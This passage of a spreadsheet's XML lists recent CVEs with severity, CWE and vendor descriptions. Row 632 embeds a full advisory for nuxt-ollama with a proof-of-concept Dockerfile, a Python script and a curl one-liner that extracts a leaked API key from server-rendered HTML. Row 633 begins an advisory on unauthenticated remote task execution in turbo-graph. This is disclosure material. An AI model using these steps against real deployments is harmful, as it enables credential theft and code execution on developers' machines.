          <t>VLC media player versions 3.0.0 through 3.0.23 contain a memory-safety vulnerability reachable when processing crafted media. Exploitation requires user interaction and may result in application termination or code execution with the privileges of the VLC process.</t>
        </is>
      </c>
      <c r="S626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56711</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63387</t>
        </is>
      </c>
      <c r="D627" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F627" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G627" s="5" t="inlineStr"/>
      <c r="H627" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I627" s="5" t="inlineStr"/>
      <c r="J627" s="5" t="inlineStr"/>
      <c r="K627" s="5" t="inlineStr"/>
      <c r="L627" s="5" t="inlineStr"/>
      <c r="M627" s="5" t="inlineStr"/>
      <c r="N627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O627" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr"/>
      <c r="Q627" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193, CWE-787</t>
        </is>
      </c>
      <c r="R627" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has an off-by-one stack buffer overflow in evdns.c when dnsname_to_labels formats a name-bearing DNS record at the end of the 64 KB stack buffer allocated by evdns_server_request_format_response. The final-label check permits j plus label_len plus one to equal buf_len, after which the terminating null byte is written to buf[buf_len]. A crafted DNS server response containing PTR, CNAME, MX, NS, or SOA data can trigger the one-byte out-of-bounds write and crash or corrupt the process. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63387</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79636</t>
        </is>
      </c>
      <c r="D628" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F628" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G628" s="5" t="inlineStr"/>
      <c r="H628" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I628" s="5" t="inlineStr"/>
      <c r="J628" s="5" t="inlineStr"/>
      <c r="K628" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L628" s="5" t="inlineStr"/>
      <c r="M628" s="5" t="inlineStr"/>
      <c r="N628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O628" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr"/>
      <c r="Q628" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="R628"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unauthorized access.</t>
        </is>
      </c>
      <c r="S628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79636</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87088</t>
        </is>
      </c>
      <c r="D629" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F629" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr">
        <is>
          <t>tanium:enforce</t>
        </is>
      </c>
      <c r="L629" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr"/>
      <c r="Q629" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R629" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="S629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87088</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87825</t>
        </is>
      </c>
      <c r="D630" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F630" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr"/>
      <c r="K630" s="5" t="inlineStr"/>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr"/>
      <c r="Q630" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R630" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 contains a use-after-free vulnerability where streams and contexts hold a dictionary's shared lock only during the load call, allowing the dictionary to be closed while still referenced. Attackers can close a dictionary after associating it with a stream or context, causing subsequent read or write operations to access freed native memory, resulting in silent data corruption or JVM crashes.</t>
        </is>
      </c>
      <c r="S630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87825</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87877</t>
        </is>
      </c>
      <c r="D631" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F631" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr"/>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr"/>
      <c r="Q631" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R631" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions before 1.5.7-14 fail to validate closed state in setDict, setLongMax, setLevel and setRefMultipleDDicts methods of stream classes. Attackers can call these methods on closed streams to write through freed native pointers, corrupting unrelated objects or crashing the JVM.</t>
        </is>
      </c>
      <c r="S631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87877</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59158</t>
        </is>
      </c>
      <c r="D632" s="5" t="inlineStr"/>
      <c r="E632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F632" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr"/>
      <c r="L632" s="5" t="inlineStr">
        <is>
          <t>npm:nuxt-ollama</t>
        </is>
      </c>
      <c r="M632" s="5" t="inlineStr">
        <is>
          <t>1.3.1</t>
        </is>
      </c>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr"/>
      <c r="P632" s="5" t="inlineStr"/>
      <c r="Q632" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R632" s="5" t="inlineStr">
        <is>
          <t>## Public Runtime Config Exposes Ollama API Key to Browser Clients
### Summary
`nuxt-ollama@1.2.26` unconditionally merges all module options — including `api_key` — into Nuxt's **public** runtime config (`runtimeConfig.public.ollama`). Nuxt serializes `runtimeConfig.public` into the SSR HTML response inside a `&lt;script&gt;` payload block (`window.__NUXT__`), making the API key visible in plaintext to any unauthenticated HTTP client that fetches the page. An attacker with no credentials can steal the Ollama cloud API key with a single HTTP GET request, then use it to make arbitrary requests to the Ollama API at the operator's expense.
### Details
The vulnerability is a design flaw in `src/module.ts`. During Nuxt module setup, the entire `_options` object — which contains `api_key` when configured for cloud Ollama as documented in `README.md:71-80` — is merged into the **public** runtime config namespace:
```ts
// src/module.ts:35-36
const currentConfig = (runtimeConfig.public.ollama ?? {}) as OllamaOptions
runtimeConfig.public.ollama = defu(currentConfig, _options)
```
Nuxt's SSR pipeline serializes `runtimeConfig.public` and embeds it in every server-rendered HTML page for client-side hydration. This results in the `api_key` appearing verbatim in the `window.__NUXT__` script block:
```html
&lt;script&gt;
window.__NUXT__={};
window.__NUXT__.config={
  public:{
    ollama:{
      protocol:"https",
      host:"api.ollama.com",
      port:"",
      proxy:false,
      api_key:"LEAKED_TEST_KEY_123"  // ← secret exposed to browser
    }
  }
}
&lt;/script&gt;
```
The browser-side composable (`src/runtime/composables/useOllama.ts`) then reads this value and sends it as an `Authorization: Bearer` header in client-side Ollama API calls:
```ts
// src/runtime/composables/useOllama.ts:6-10
const options: ModuleOptions = useRuntimeConfig().public.ollama as ModuleOptions
if (options.api_key) {
  headers.Authorization = `Bearer ${options.api_key}`
}
return new Ollama({ host, proxy: options.proxy, headers })
```
The complete data flow from source to sink:
1. `README.md:71-80` — official documentation instructs users to set `ollama.api_key` for cloud Ollama models
2. `src/module.ts:35-36` — **source**: `api_key` is merged into `runtimeConfig.public.ollama`
3. Nuxt SSR runtime — `runtimeConfig.public` is serialized into HTML `__NUXT__` payload
4. `src/runtime/composables/useOllama.ts:6` — browser composable reads `useRuntimeConfig().public.ollama`
5. `src/runtime/composables/useOllama.ts:8-10` — **sink**: `options.api_key` becomes `headers.Authorization` in client-side HTTP request
The `api_key` value is never private (i.e., placed in `runtimeConfig.ollama`) and no sanitization removes it from the public namespace before serialization.
**Recommended remediation:** Move `api_key` to the private runtime config and remove it from the browser composable:
```diff
-    const currentConfig = (runtimeConfig.public.ollama ?? {}) as OllamaOptions
-    runtimeConfig.public.ollama = defu(currentConfig, _options)
+    const { api_key, ...publicOptions } = _options
+    const currentPublicConfig = (runtimeConfig.public.ollama ?? {}) as Omit&lt;OllamaOptions, 'api_key'&gt;
+    runtimeConfig.public.ollama = defu(currentPublicConfig, publicOptions)
+    const currentPrivateConfig = (runtimeConfig.ollama ?? {}) as Pick&lt;ModuleOptions, 'api_key'&gt;
+    runtimeConfig.ollama = defu(currentPrivateConfig, { api_key })
```
The `api_key` should then only be consumed in the server-side utility (`src/runtime/server/utils/useOllama.ts`) via `useRuntimeConfig().ollama.api_key`.
### PoC
**Prerequisites:** Docker, Python 3
**Step 1 — Build the vulnerable Nuxt app container**
```bash
docker build \
  -f /path/to/vuln-001/Dockerfile \
  -t nuxt-ollama-vuln-001 \
  /path/to/npmAI_735_thoda-dev__nuxt-ollama
```
The Dockerfile uses the nuxt-ollama source at commit `6989ea8` and injects the following `playground/nuxt.config.ts` — the exact cloud configuration pattern from `README.md:71-80`:
```ts
export default defineNuxtConfig({
  modules: ['../src/module'],
  compatibilityDate: '2025-10-29',
  devtools: { enabled: false },
  ollama: {
    protocol: 'https',
    host: 'api.ollama.com',
    api_key: 'LEAKED_TEST_KEY_123'   // sentinel key
  }
})
```
**Step 2 — Start the container**
```bash
docker run -d --name nuxt-ollama-poc-001 -p 3000:3000 nuxt-ollama-vuln-001
```
**Step 3 — Retrieve the API key with a single unauthenticated HTTP request**
```bash
curl -s http://127.0.0.1:3000/ | grep -o 'api_key":"[^"]*"'
# Expected: api_key":"LEAKED_TEST_KEY_123"
```
**Automated PoC script**
```bash
python3 /path/to/vuln-001/poc.py
```
**Expected output (confirmed in dynamic reproduction):**
```
window.__NUXT__.config={
  public:{
    ollama:{
      protocol:"https",
      host:"api.ollama.com",
      port:"",
      proxy:false,
      api_key:"LEAKED_TEST_KEY_123"
    }
  }
}
```
The sentinel key `LEAKED_TEST_KEY_123` appears in the HTML body of an unauthenticated HTTP GET response, confirming the leak.
### Impact
This is a **credentials exposure** vulnerability (CWE-522). Any unauthenticated party — including passive network observers, web crawlers, or anonymous visitors — who fetches the HTML page of an application using `nuxt-ollama` with a cloud `api_key` configured can extract the API key from the `__NUXT__` script payload.
**Who is impacted:**
- **Operators/developers** who follow the official documentation to configure `ollama.api_key` for cloud Ollama models. They are unaware that the key is being published to every visitor.
- **End-users** of applications built with this module are not directly at risk, but their requests may be intercepted or the service degraded if attackers exhaust rate limits or billing quotas on the stolen key.
**Potential consequences of key theft:**
- Unauthorized use of the Ollama cloud API at the operator's cost
- Rate-limit exhaustion or quota abuse
- Data exfiltration if the compromised key has read access to stored models or conversations
- Reputational damage and service disruption for the affected application
The vulnerability does not require any special conditions beyond the operator following the documented configuration; no user interaction or prior authentication is needed by the attacker.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# syntax=docker/dockerfile:1
# VULN-001 PoC: nuxt-ollama@1.2.26 — Public Runtime Config Exposes Ollama API Key
# CWE-522: Insufficiently Protected Credentials
# CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High)
#
# Vulnerability mechanism:
#   src/module.ts:36 — runtimeConfig.public.ollama = defu(currentConfig, _options)
#   This places api_key into Nuxt's PUBLIC runtime config, which Nuxt serializes
#   into the SSR HTML response (__NUXT__ / __NUXT_DATA__ payload).
#   Any unauthenticated HTTP client reading the page HTML sees the API key in plaintext.
FROM node:20-alpine
# Install pnpm matching the repo's packageManager field (pnpm@10.33.4)
RUN npm install -g pnpm@10.33.4
WORKDIR /app
# Copy the nuxt-ollama source repository
COPY repo/ ./
# Install all project dependencies.
# .npmrc already sets: shamefully-hoist=true, strict-peer-dependencies=false
RUN pnpm install --frozen-lockfile
# Override playground/nuxt.config.ts: inject a sentinel api_key to simulate
# a real-world cloud Ollama deployment as documented in README.md:71-80.
# This is the exact vulnerable configuration pattern described in the docs.
RUN cat &gt; playground/nuxt.config.ts &lt;&lt; 'EOF'
export default defineNuxtConfig({
  modules: ['../src/module'],
  compatibilityDate: '2025-10-29',
  devtools: { enabled: false },
  ollama: {
    protocol: 'https',
    host: 'api.ollama.com',
    api_key: 'LEAKED_TEST_KEY_123'
  }
})
EOF
# Replace app.vue with a minimal template that does NOT make Ollama API calls.
# The api_key leak occurs in the Nuxt SSR payload, not in the visible template.
# The original playground app.vue calls useFetch('/api/ollama') which requires
# a live Ollama server; replacing it keeps this PoC self-contained.
RUN cat &gt; playground/app.vue &lt;&lt; 'EOF'
&lt;template&gt;
  &lt;div&gt;nuxt-ollama VULN-001 PoC — check Nuxt SSR payload for api_key&lt;/div&gt;
&lt;/template&gt;
EOF
# Build the playground in production SSR mode.
# During the module setup() call, src/module.ts:36 merges all _options (including
# api_key) into runtimeConfig.public.ollama. At request time, Nuxt serializes
# runtimeConfig.public into the HTML response for client-side hydration.
RUN pnpm exec nuxi build playground
EXPOSE 3000
ENV HOST=0.0.0.0
ENV PORT=3000
ENV NITRO_HOST=0.0.0.0
ENV NITRO_PORT=3000
CMD ["node", "/app/playground/.output/server/index.mjs"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
VULN-001 Proof of Concept
Package : nuxt-ollama@1.2.26 (thoda-dev/nuxt-ollama, commit 6989ea8)
Title   : Public Runtime Config Exposes Ollama API Key to Browser Clients
CWE     : CWE-522 - Insufficiently Protected Credentials
CVSS    : 7.5 High  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack summary
--------------
When a Nuxt app installs nuxt-ollama and sets ollama.api_key (per README.md:71-80
for cloud Ollama), the module's setup() function in src/module.ts:36 merges the
entire _options object—api_key included—into runtimeConfig.public.ollama.
Nuxt's SSR pipeline serialises runtimeConfig.public for client-side hydration and
embeds it in the HTML response inside a &lt;script&gt; payload block (__NUXT__ /
__NUXT_DATA__).  Any unauthenticated HTTP GET request to the home page therefore
returns the api_key in plain text, with no authentication required.
This script:
  1. Builds a Docker image from the nuxt-ollama source with a sentinel api_key.
  2. Starts the image as a local container.
  3. Fetches http://127.0.0.1:3000/ and searches for the sentinel key.
  4. Prints an evidence excerpt and writes phase2_result.json.
"""
import json
import os
import subprocess
import sys
import time
import urllib.request
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
TARGET_KEY      = "LEAKED_TEST_KEY_123"
IMAGE_NAME      = "nuxt-ollama-vuln-001"
CONTAINER_NAME  = "nuxt-ollama-poc-001"
HOST            = "127.0.0.1"
PORT            = 3000
URL             = f"http://{HOST}:{PORT}/"
SCRIPT_DIR  = os.path.dirname(os.path.abspath(__file__))
PARENT_DIR  = os.path.dirname(SCRIPT_DIR)       # build context (contains repo/)
DOCKERFILE  = os.path.join(SCRIPT_DIR, "Dockerfile")
RESULT_FILE = os.path.join(SCRIPT_DIR, "phase2_result.json")
BUILD_CMD = f"docker build -f {DOCKERFILE} -t {IMAGE_NAME} {PARENT_DIR}"
RUN_CMD   = (
    f"docker run -d --name {CONTAINER_NAME} "
    f"-p {PORT}:{PORT} {IMAGE_NAME}"
)
POC_CMD   = f"python3 {os.path.join(SCRIPT_DIR, 'poc.py')}"
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def run_cmd(cmd_list, check=True, capture=False):
    """Execute a command, printing it first; return CompletedProcess."""
    print(f"[cmd] {' '.join(cmd_list)}", flush=True)
    return subprocess.run(
        cmd_list,
        check=check,
        capture_output=capture,
        text=bool(capture),
    )
def cleanup_container():
    """Remove the PoC container if it already exists."""
    subprocess.run(["docker", "rm", "-f", CONTAINER_NAME], capture_output=True)
def wait_for_server(url, timeout=180, interval=5):
    """Poll url until it returns a non-5xx response or the timeout expires."""
    print(f"[*] Waiting for server at {url}  (timeout={timeout}s)", flush=True)
    deadline = time.time() + timeout
    while time.time() &lt; deadline:
        try:
            with urllib.request.urlopen(url, timeout=5) as resp:
                if resp.status &lt; 500:
                    print(f"[+] Server up — HTTP {resp.status}", flush=True)
                    return True
        except Exception:
            pass
        time.sleep(interval)
    return False
def save_result(data):
    """Write phase2_result.json and echo its path."""
    with open(RESULT_FILE, "w", encoding="utf-8") as fh:
        json.dump(data, fh, ensure_ascii=False, indent=2)
    print(f"\n[*] Result saved to {RESULT_FILE}", flush=True)
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def main():
    print("=" * 66)
    print("VULN-001 PoC — nuxt-ollama@1.2.26 API Key Leak via Nuxt SSR Payload")
    print("=" * 66, flush=True)
    cleanup_container()
    # ------------------------------------------------------------------
    # Step 1 — Build Docker image
    # ------------------------------------------------------------------
    print("\n[STEP 1] Building Docker image (may take several minutes) ...", flush=True)
    build_rc = run_cmd(
        ["docker", "build", "-f", DOCKERFILE, "-t", IMAGE_NAME, PARENT_DIR],
        check=False,
    ).returncode
    if build_rc != 0:
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        "Docker 이미지 빌드 실패. docker build 로그를 확인하세요.",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      f"docker build exited with returncode={build_rc}",
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        sys.exit(1)
    print("[+] Image built successfully.", flush=True)
    # ------------------------------------------------------------------
    # Step 2 — Start the container
    # ------------------------------------------------------------------
    print("\n[STEP 2] Starting container ...", flush=True)
    run_rc = run_cmd(
        ["docker", "run", "-d",
         "--name", CONTAINER_NAME,
         "-p", f"{PORT}:{PORT}",
         IMAGE_NAME],
        check=False,
    ).returncode
    if run_rc != 0:
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        "Docker 컨테이너 실행 실패.",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      f"docker run exited with returncode={run_rc}",
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        sys.exit(1)
    # ------------------------------------------------------------------
    # Step 3 — Wait for Nuxt SSR server
    # ------------------------------------------------------------------
    print("\n[STEP 3] Waiting for Nuxt SSR server ...", flush=True)
    if not wait_for_server(URL, timeout=180):
        logs = subprocess.run(
            ["docker", "logs", CONTAINER_NAME],
            capture_output=True, text=True,
        )
        log_snippet = (logs.stdout + logs.stderr)[-2000:]
        print("[!] Server did not respond within timeout. Container logs:\n", log_snippet)
        save_result({
            "passed":        False,
            "verdict":       "INCOMPLETE",
            "reason":        "Nuxt SSR 서버가 180초 이내에 응답하지 않음. 컨테이너 로그 확인 필요.",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      log_snippet,
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(1)
    # ------------------------------------------------------------------
    # Step 4 — Fetch the rendered HTML page
    # ------------------------------------------------------------------
    print(f"\n[STEP 4] GET {URL} ...", flush=True)
    try:
        with urllib.request.urlopen(URL, timeout=15) as resp:
            html = resp.read().decode("utf-8", errors="replace")
    except Exception as exc:
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        f"HTTP 요청 실패: {exc}",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      str(exc),
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(1)
    print(f"[+] Received {len(html)} bytes.", flush=True)
    # ------------------------------------------------------------------
    # Step 5 — Verify TARGET_KEY is present in the HTTP response body
    # ------------------------------------------------------------------
    print(f"\n[STEP 5] Searching for '{TARGET_KEY}' in response ...", flush=True)
    if TARGET_KEY in html:
        idx   = html.index(TARGET_KEY)
        start = max(0, idx - 200)
        end   = min(len(html), idx + len(TARGET_KEY) + 200)
        excerpt = html[start:end].strip()
        print(f"\n{'='*66}")
        print(f"[PASS]  VULNERABILITY CONFIRMED")
        print(f"'{TARGET_KEY}' is present in the unauthenticated HTTP response.")
        print(f"{'='*66}")
        print(f"Evidence excerpt:\n\n{excerpt}\n")
        print(f"{'='*66}")
        save_result({
            "passed":        True,
            "verdict":       "PASS",
            "reason":        (
                "nuxt-ollama@1.2.26의 src/module.ts:36에서 api_key를 "
                "runtimeConfig.public.ollama에 병합함. Nuxt SSR이 해당 값을 HTML 응답의 "
                "__NUXT__ 페이로드에 직렬화하여, 인증 없는 HTTP GET 요청만으로 "
                "LEAKED_TEST_KEY_123이 응답 본문에서 노출됨이 실제 실행으로 확인됨."
            ),
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      excerpt,
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(0)
    else:
        snippet = html[:3000]
        print(f"[FAIL]  '{TARGET_KEY}' NOT found in the HTTP response body.")
        print("--- HTML (first 3000 chars) ---")
        print(snippet)
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        (
                f"'{TARGET_KEY}'가 HTTP 응답 본문에서 발견되지 않음. "
                "Nuxt 빌드 버전 또는 환경 차이로 인해 직렬화 형식이 다를 수 있음."
            ),
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      snippet[:1500],
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="S632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59158</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59160</t>
        </is>
      </c>
      <c r="D633" s="5" t="inlineStr"/>
      <c r="E633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F633" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr"/>
      <c r="L633" s="5" t="inlineStr">
        <is>
          <t>npm:@yeger/turbo-graph</t>
        </is>
      </c>
      <c r="M633" s="5" t="inlineStr">
        <is>
          <t>2.8.12</t>
        </is>
      </c>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr"/>
      <c r="P633" s="5" t="inlineStr"/>
      <c r="Q633" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R633" s="5" t="inlineStr">
        <is>
          <t>## Unauthenticated Network-Exposed Turborepo Task Execution via /api/run
### Summary
`@yeger/turbo-graph` starts its embedded Next.js server without binding to the loopback interface, causing it to listen on all network interfaces (`0.0.0.0:29312` by default). The `/api/run` HTTP endpoint exposed by this server performs no authentication, authorization, CSRF protection, or task allowlist check before executing attacker-supplied Turborepo task names via `spawn()`. Any adjacent-network attacker can send an unauthenticated GET request to trigger arbitrary tasks defined in the victim's repository, resulting in code execution, file modification, destructive build side effects, or deployment of attacker-chosen targets with the privileges of the developer's OS user.
### Details
Two independent flaws combine to create a remotely exploitable unauthenticated code execution vulnerability:
**Flaw 1 — Server bound to all interfaces (not loopback)**
`packages/turbo-graph/src/index.ts:44` calls `.listen(options.port, callback)` without passing a hostname argument. Although `const hostname = 'localhost'` is declared at line 19, it is used only for constructing the console log URL and is never passed to `listen()`. Node.js therefore defaults to binding on `0.0.0.0` (all IPv4 interfaces) and `::` (all IPv6 interfaces), making the server reachable from the local network segment.
```ts
// packages/turbo-graph/src/index.ts
19    const hostname = 'localhost'  // used only for console URL, not for listen()
...
44        .listen(options.port, () =&gt; {   // hostname argument missing → 0.0.0.0 bind
45          const url = `http://${hostname}:${options.port}`
```
**Flaw 2 — Unauthenticated `/api/run` task execution endpoint**
`packages/turbo-graph-ui/app/api/run/route.ts:156–177` defines `GET()`, which reads `tasks`, `filter`, and `force` from the request query string and passes them directly to `buildResponseFromArgs`, which appends them to a Turbo CLI argument array and calls `spawn()`. There is no authentication check, no session validation, no CSRF token, and no task allowlist anywhere in this handler.
```ts
// packages/turbo-graph-ui/app/api/run/route.ts
156  export function GET(req: NextRequest) {
157    const url = new URL(req.url)
159    const tasksParam = url.searchParams.getAll('tasks')   // attacker-controlled source
171    const filter = url.searchParams.get('filter') ?? undefined
176    return buildResponseFromArgs(tasks, filter, req.signal, { force })
// buildResponseFromArgs — packages/turbo-graph-ui/app/api/run/route.ts
20    const args: string[] = ['run', ...tasks]              // tasks inserted directly
25          args.push(`--filter=${trimmed}`)
31      args.push('--force')
34    const child = spawn(turboBin, args, { cwd: dir, env: { ...process.env, CI: 'true' } })
                                                            // ^ sink: arbitrary task execution
